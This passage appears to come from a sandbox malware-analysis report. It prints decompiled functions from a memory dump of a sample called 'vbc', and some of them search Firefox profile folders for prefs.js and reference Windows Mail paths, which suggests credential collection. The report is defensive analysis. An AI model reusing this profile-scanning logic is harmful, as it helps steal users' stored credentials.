                                                                                                                                                    Function 004098F4 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004098F4(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t15;
				intOrPtr* _t24;
				char* _t26;

				_t24 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
				_t26 =  &_v260;
				E00409018(_t26, _t15);
				sprintf( &_v516, "</%s>\r\n", _t26);
				return E00405EFD(_a4,  &_v516);
			}











                                                                                                                                                    0x0040990e
                                                                                                                                                    0x00409910
                                                                                                                                                    0x00409917
                                                                                                                                                    0x00409926
                                                                                                                                                    0x0040992d
                                                                                                                                                    0x00409939
                                                                                                                                                    0x0040993d
                                                                                                                                                    0x00409943
                                                                                                                                                    0x00409957
                                                                                                                                                    0x00409971

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00409917
                                                                                                                                                    • memset.MSVCRT ref: 0040992D
                                                                                                                                                      • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                                                                      • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                                                                                    • sprintf.MSVCRT ref: 00409957
                                                                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                                                                                    • String ID: </%s>
                                                                                                                                                    • API String ID: 3202206310-259020660
                                                                                                                                                    • Opcode ID: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                                                                                                    • Instruction ID: adbfc7571eef3522ba50f6b4148bdf50dea618c8f0168b60c77ad4ff43fabaf4
                                                                                                                                                    • Opcode Fuzzy Hash: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                                                                                                    • Instruction Fuzzy Hash: B201D1729001297AD720A719CC45FDA7AACAF84304F0400FAB60AF3182DA749F848BA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406734 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406734(char* __edi, char* _a4) {
				char* _t12;
				int _t13;

				_t12 = __edi;
				_t13 = strlen(__edi);
				if(strlen(_a4) + _t13 < 0x104) {
					_t2 =  &_a4; // 0x410d64
					strcat(_t13 + __edi,  *_t2);
				}
				return _t12;
			}





                                                                                                                                                    0x00406734
                                                                                                                                                    0x0040673f
                                                                                                                                                    0x0040674f
                                                                                                                                                    0x00406751
                                                                                                                                                    0x00406758
                                                                                                                                                    0x0040675e
                                                                                                                                                    0x00406762

                                                                                                                                                    APIs
                                                                                                                                                    • strlen.MSVCRT ref: 00406736
                                                                                                                                                    • strlen.MSVCRT ref: 00406741
                                                                                                                                                    • strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strlen$strcat
                                                                                                                                                    • String ID: dA
                                                                                                                                                    • API String ID: 2335785903-82490789
                                                                                                                                                    • Opcode ID: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                                                                                                                    • Instruction ID: 8adb96eafe51badce5d1f431fd236154b3227263db9247bb640c15329514921a
                                                                                                                                                    • Opcode Fuzzy Hash: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                                                                                                                    • Instruction Fuzzy Hash: EFD05E3350852036C5152316BC429DE5B82CBC037CB15445FF609921A1E93D84D1859D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402221 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E00402221(void* __ecx, intOrPtr _a4, char* _a8) {
				void* __ebx;
				intOrPtr _t22;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t36;
				signed short _t42;
				char* _t47;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				void* _t57;

				_t22 = _a4;
				_t57 = _t22 - 6;
				_t47 = _a8;
				_t48 = __ecx;
				 *_t47 = 0;
				if(_t57 > 0) {
					_t23 = _t22 - 7;
					if(_t23 == 0) {
						return __ecx + 0x214;
					}
					_t25 = _t23 - 1;
					if(_t25 == 0) {
						return __ecx + 0x294;
					}
					_t27 = _t25 - 1;
					if(_t27 == 0) {
						return __ecx + 0x314;
					}
					_t29 = _t27 - 1;
					if(_t29 == 0) {
						_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
						if(_t49 < 1 || _t49 > 7) {
							if(_t49 < 8 || _t49 > 0xe) {
								if(_t49 < 0xf || _t49 > 0x19) {
									if(_t49 < 0x1a || _t49 > 0x2d) {
										if(_t49 < 0x2e) {
											L16:
											return _t47;
										}
										_t42 = 0x519;
									} else {
										_t42 = 0x518;
									}
								} else {
									_t42 = 0x517;
								}
							} else {
								_t42 = 0x516;
							}
							goto L20;
						} else {
							_t42 = 0x515;
							L20:
							return E004078FF(_t42);
						}
					}
					_t32 = _t29 - 1;
					if(_t32 == 0) {
						return __ecx + 0x190;
					}
					if(_t32 != 1) {
						goto L16;
					}
					_t50 =  *((intOrPtr*)(__ecx + 0x39c));
					L14:
					if(_t50 != 0) {
						_push(0xa);
						_push(_t47);
						_push(_t50);
						L0041158E();
					}
					goto L16;
				}
				if(_t57 == 0) {
					_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
					goto L20;
				}
				if(_t22 == 0xfffffff6) {
					_t36 = E004078FF( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
					sprintf(_t47, "%s  %s  %s", E004078FF( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
					goto L16;
				}
				if(_t22 == 0) {
					return __ecx + 0xc;
				}
				if(_t22 == 1) {
					_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
					goto L20;
				}
				if(_t22 == 2) {
					return __ecx + 0x90;
				}
				if(_t22 == 3) {
					return __ecx + 0x110;
				}
				if(_t22 == 4) {
					_t50 =  *((intOrPtr*)(__ecx + 0x394));
					goto L14;
				}
				if(_t22 != 5) {
					goto L16;
				}
				if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
					_push(0x10);
				} else {
					_push(0xf);
				}
				_pop(_t42);
				goto L20;
			}

















                                                                                                                                                    0x00402221
                                                                                                                                                    0x00402225
                                                                                                                                                    0x0040222b
                                                                                                                                                    0x0040222f
                                                                                                                                                    0x00402231
                                                                                                                                                    0x00402234
                                                                                                                                                    0x00402312
                                                                                                                                                    0x00402315
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004023c2
                                                                                                                                                    0x0040231b
                                                                                                                                                    0x0040231c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004023ba
                                                                                                                                                    0x00402322
                                                                                                                                                    0x00402323
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004023b2
                                                                                                                                                    0x00402329
                                                                                                                                                    0x0040232a
                                                                                                                                                    0x00402349
                                                                                                                                                    0x00402352
                                                                                                                                                    0x00402366
                                                                                                                                                    0x0040237a
                                                                                                                                                    0x0040238e
                                                                                                                                                    0x004023a2
                                                                                                                                                    0x0040228e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040228e
                                                                                                                                                    0x004023a8
                                                                                                                                                    0x00402395
                                                                                                                                                    0x00402395
                                                                                                                                                    0x00402395
                                                                                                                                                    0x00402381
                                                                                                                                                    0x00402381
                                                                                                                                                    0x00402381
                                                                                                                                                    0x0040236d
                                                                                                                                                    0x0040236d
                                                                                                                                                    0x0040236d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402359
                                                                                                                                                    0x00402359
                                                                                                                                                    0x004022b7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004022b7
                                                                                                                                                    0x00402352
                                                                                                                                                    0x0040232c
                                                                                                                                                    0x0040232d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402341
                                                                                                                                                    0x00402330
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402336
                                                                                                                                                    0x0040227e
                                                                                                                                                    0x00402280
                                                                                                                                                    0x00402282
                                                                                                                                                    0x00402284
                                                                                                                                                    0x00402285
                                                                                                                                                    0x00402286
                                                                                                                                                    0x0040228b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402280
                                                                                                                                                    0x0040223a
                                                                                                                                                    0x0040230a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040230a
                                                                                                                                                    0x00402243
                                                                                                                                                    0x004022d5
                                                                                                                                                    0x004022fa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004022ff
                                                                                                                                                    0x0040224b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004022c1
                                                                                                                                                    0x00402250
                                                                                                                                                    0x004022b1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004022b1
                                                                                                                                                    0x00402255
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004022a0
                                                                                                                                                    0x0040225a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402295
                                                                                                                                                    0x0040225f
                                                                                                                                                    0x00402278
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402278
                                                                                                                                                    0x00402264
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040226d
                                                                                                                                                    0x00402274
                                                                                                                                                    0x0040226f
                                                                                                                                                    0x0040226f
                                                                                                                                                    0x0040226f
                                                                                                                                                    0x00402271
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _ultoasprintf
                                                                                                                                                    • String ID: %s %s %s
                                                                                                                                                    • API String ID: 432394123-3850900253
                                                                                                                                                    • Opcode ID: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                                                                                                                    • Instruction ID: d9c328b9b741649d7ae815da5d558f3ae5f994b92098e95e7c9169487fd3f945
                                                                                                                                                    • Opcode Fuzzy Hash: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                                                                                                                    • Instruction Fuzzy Hash: C4410932504B15C7C636956487CCBEBA264A742304F6508BFEC5AF72D1C2FCAD41976B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D37A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E0040D37A(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v328;
				char _v652;
				char _v928;
				char _v1296;
				signed int _v1300;
				void* __esi;
				char* _t26;
				intOrPtr* _t43;

				_v1300 = _v1300 | 0xffffffff;
				_v1296 = 0;
				_v328 = 0;
				_v652 = 0;
				_t43 = __ecx;
				E00406E68( &_v1300, __eflags, "*.*", _a4);
				while(E00406EC3( &_v1300) != 0) {
					__eflags = E00406E2D( &_v1300);
					if(__eflags == 0) {
						__eflags = _a8 - 1;
						if(_a8 > 1) {
							_t26 =  &_v928;
							_push("prefs.js");
							_push(_t26);
							L004115B2();
							__eflags = _t26;
							if(_t26 == 0) {
								__eflags = E0040614B( &_v652);
								if(__eflags != 0) {
									E0040D1EC(_t43, __eflags,  &_v652);
								}
							}
						}
					} else {
						_a8 = _a8 + 1;
						E0040D37A(_t43, __eflags,  &_v652, _a8);
					}
				}
				E00406F5B( &_v1300);
				return 1;
			}











                                                                                                                                                    0x0040d386
                                                                                                                                                    0x0040d391
                                                                                                                                                    0x0040d395
                                                                                                                                                    0x0040d39c
                                                                                                                                                    0x0040d3ac
                                                                                                                                                    0x0040d3ae
                                                                                                                                                    0x0040d418
                                                                                                                                                    0x0040d3be
                                                                                                                                                    0x0040d3c0
                                                                                                                                                    0x0040d3d9
                                                                                                                                                    0x0040d3dd
                                                                                                                                                    0x0040d3df
                                                                                                                                                    0x0040d3e6
                                                                                                                                                    0x0040d3eb
                                                                                                                                                    0x0040d3ec
                                                                                                                                                    0x0040d3f1
                                                                                                                                                    0x0040d3f5
                                                                                                                                                    0x0040d404
                                                                                                                                                    0x0040d407
                                                                                                                                                    0x0040d413
                                                                                                                                                    0x0040d413
                                                                                                                                                    0x0040d407
                                                                                                                                                    0x0040d3f5
                                                                                                                                                    0x0040d3c2
                                                                                                                                                    0x0040d3c2
                                                                                                                                                    0x0040d3d2
                                                                                                                                                    0x0040d3d2
                                                                                                                                                    0x0040d3c0
                                                                                                                                                    0x0040d429
                                                                                                                                                    0x0040d435

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strlen$FileFindFirst
                                                                                                                                                    • String ID: *.*$prefs.js
                                                                                                                                                    • API String ID: 2516927864-1592826420
                                                                                                                                                    • Opcode ID: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                                                                                                                    • Instruction ID: f0fdac10561689b7590a9d658f3f63ad40faf00aab35cef1d8d79f75c7dff1a2
                                                                                                                                                    • Opcode Fuzzy Hash: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                                                                                                                    • Instruction Fuzzy Hash: 2711E731408349AAD720EAA5C8019DB77DC9F85324F00493FF869E21C1DB38E61E87AB
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406680 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406680(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				char* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v64 = _v64 & 0x00000000;
				_v44 = _v44 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v56 = _t23;
				_v32 = _a8;
				_v20 = _a12;
				_v76 = _t34;
				_v80 = 0x4c;
				_v68 = _a4;
				_v52 = _t38;
				_v48 = 0x104;
				_v28 = 0x80806;
				if(GetSaveFileNameA( &_v80) == 0) {
					return 0;
				} else {
					if(_t33 != 0) {
						 *_t33 = _v56;
					}
					strcpy(_t38, _v52);
					return 1;
				}
			}



















                                                                                                                                                    0x00406680
                                                                                                                                                    0x00406680
                                                                                                                                                    0x00406680
                                                                                                                                                    0x00406688
                                                                                                                                                    0x0040668b
                                                                                                                                                    0x0040668d
                                                                                                                                                    0x0040668d
                                                                                                                                                    0x0040668f
                                                                                                                                                    0x00406693
                                                                                                                                                    0x00406697
                                                                                                                                                    0x0040669b
                                                                                                                                                    0x004066a1
                                                                                                                                                    0x004066a7
                                                                                                                                                    0x004066aa
                                                                                                                                                    0x004066b4
                                                                                                                                                    0x004066bb
                                                                                                                                                    0x004066be
                                                                                                                                                    0x004066c1
                                                                                                                                                    0x004066c8
                                                                                                                                                    0x004066d7
                                                                                                                                                    0x004066f5
                                                                                                                                                    0x004066d9
                                                                                                                                                    0x004066db
                                                                                                                                                    0x004066e0
                                                                                                                                                    0x004066e0
                                                                                                                                                    0x004066e6
                                                                                                                                                    0x004066f1
                                                                                                                                                    0x004066f1

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileNameSavestrcpy
                                                                                                                                                    • String ID: L
                                                                                                                                                    • API String ID: 1182090483-2909332022
                                                                                                                                                    • Opcode ID: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                                                                                                    • Instruction ID: a38c0b8f1c2b7ba0f1b8aa2faef71ae79cae630a3543d59e66951d479f2b4fd1
                                                                                                                                                    • Opcode Fuzzy Hash: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                                                                                                    • Instruction Fuzzy Hash: 7F0125B1E102199FDF00CFA9D8807AEBBF8FF08319F10442AE915E6280DBB88915CF44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040ADB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040ADB3(void* __ebx, void* __eflags) {
				char _v265;
				char _v526;
				char _v787;
				void _v1048;
				void _v3648;
				intOrPtr _v3652;
				char _v3660;
				void* _t30;

				_t30 = __ebx;
				_v3660 = 0x41300c;
				memset( &_v3648, 0, 0x10);
				_v1048 = 0;
				_v787 = 0;
				_v526 = 0;
				_v265 = 0;
				_v3652 = 0x6c;
				memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
				if(E00401596( &_v3660,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
					E0040AD9D(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
				}
				SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
				return E0040143D( &_v3660);
			}











                                                                                                                                                    0x0040adb3
                                                                                                                                                    0x0040adc9
                                                                                                                                                    0x0040add3
                                                                                                                                                    0x0040ade7
                                                                                                                                                    0x0040adee
                                                                                                                                                    0x0040adf5
                                                                                                                                                    0x0040adfc
                                                                                                                                                    0x0040ae03
                                                                                                                                                    0x0040ae1e
                                                                                                                                                    0x0040ae2d
                                                                                                                                                    0x0040ae4a
                                                                                                                                                    0x0040ae4a
                                                                                                                                                    0x0040ae5b
                                                                                                                                                    0x0040ae6f

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040ADD3
                                                                                                                                                    • SetFocus.USER32(?,?), ref: 0040AE5B
                                                                                                                                                      • Part of subcall function 0040AD9D: PostMessageA.USER32 ref: 0040ADAC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FocusMessagePostmemset
                                                                                                                                                    • String ID: l
                                                                                                                                                    • API String ID: 3436799508-2517025534
                                                                                                                                                    • Opcode ID: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                                                                                                    • Instruction ID: a3aa1947760d1632b5ff20bf1b11b778d92a779fff19439862dc3abef3b95f30
                                                                                                                                                    • Opcode Fuzzy Hash: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                                                                                                    • Instruction Fuzzy Hash: 1011A1719002589BDF21AB14CC047CA7BAAAF80308F0804F5A94C7B292C7B55B88CFA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408441 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00408441(void** __esi, struct HWND__* _a4) {
				long _v12;
				signed int _v24;
				signed int _v28;
				short _v32;
				void* _v40;
				long _t17;
				short* _t23;
				int _t24;
				void** _t25;

				_t25 = __esi;
				_t24 = 0;
				if(_a4 != 0) {
					_t17 = memset( *__esi, 0, __esi[1] << 2);
					if(__esi[1] > 0) {
						do {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							_t23 =  *_t25 + _t24 * 4;
							_v40 = 0x22;
							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
							if(_t17 != 0) {
								 *_t23 = _v32;
								_t17 = _v12;
								 *(_t23 + 2) = _t17;
							}
							_t24 = _t24 + 1;
						} while (_t24 < _t25[1]);
					}
				}
				return _t17;
			}












                                                                                                                                                    0x00408441
                                                                                                                                                    0x00408449
                                                                                                                                                    0x0040844e
                                                                                                                                                    0x0040845a
                                                                                                                                                    0x00408465
                                                                                                                                                    0x00408467
                                                                                                                                                    0x00408469
                                                                                                                                                    0x0040846d
                                                                                                                                                    0x00408471
                                                                                                                                                    0x00408481
                                                                                                                                                    0x00408488
                                                                                                                                                    0x00408490
                                                                                                                                                    0x00408496
                                                                                                                                                    0x00408499
                                                                                                                                                    0x0040849d
                                                                                                                                                    0x0040849d
                                                                                                                                                    0x004084a1
                                                                                                                                                    0x004084a2
                                                                                                                                                    0x00408467
                                                                                                                                                    0x00408465
                                                                                                                                                    0x004084aa

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                    • String ID: "
                                                                                                                                                    • API String ID: 568519121-123907689
                                                                                                                                                    • Opcode ID: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                                                                                                    • Instruction ID: 3d4b9897b9e590d379032152458179bae83636b6f0047c21005e3f982915147a
                                                                                                                                                    • Opcode Fuzzy Hash: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                                                                                                    • Instruction Fuzzy Hash: 4F01D635900205AFDB20CF95C941EAFB7F8FF84759F10842EE891AA240E738DA85CB75
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406618 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406618(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				_v20 = 0x413008;
				if(GetOpenFileNameA( &_v80) == 0) {
					return 0;
				} else {
					strcpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                                                                    0x0040661e
                                                                                                                                                    0x00406624
                                                                                                                                                    0x00406629
                                                                                                                                                    0x0040662c
                                                                                                                                                    0x0040662f
                                                                                                                                                    0x00406635
                                                                                                                                                    0x0040663c
                                                                                                                                                    0x00406643
                                                                                                                                                    0x0040664a
                                                                                                                                                    0x0040664d
                                                                                                                                                    0x00406654
                                                                                                                                                    0x0040665b
                                                                                                                                                    0x0040666a
                                                                                                                                                    0x0040667f
                                                                                                                                                    0x0040666c
                                                                                                                                                    0x00406670
                                                                                                                                                    0x0040667b
                                                                                                                                                    0x0040667b

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileNameOpenstrcpy
                                                                                                                                                    • String ID: L
                                                                                                                                                    • API String ID: 812585365-2909332022
                                                                                                                                                    • Opcode ID: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                                                                                                                    • Instruction ID: 13dc2997c8553d865726dff807e233ea18e6c60b58d53e24b26ad6de5975139e
                                                                                                                                                    • Opcode Fuzzy Hash: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                                                                                                                    • Instruction Fuzzy Hash: 5201B2B1D10218AFCF40DFA9D8456CEBFF8BB08308F00812AE519E6240E7B886458F98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407BB9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadMenuA.USER32 ref: 00407BC1
                                                                                                                                                    • sprintf.MSVCRT ref: 00407BE4
                                                                                                                                                      • Part of subcall function 00407A64: GetMenuItemCount.USER32 ref: 00407A7A
                                                                                                                                                      • Part of subcall function 00407A64: memset.MSVCRT ref: 00407A9E
                                                                                                                                                      • Part of subcall function 00407A64: GetMenuItemInfoA.USER32 ref: 00407AD4
                                                                                                                                                      • Part of subcall function 00407A64: memset.MSVCRT ref: 00407B01
                                                                                                                                                      • Part of subcall function 00407A64: strchr.MSVCRT ref: 00407B0D
                                                                                                                                                      • Part of subcall function 00407A64: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407B68
                                                                                                                                                      • Part of subcall function 00407A64: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407B84
                                                                                                                                                    Strings
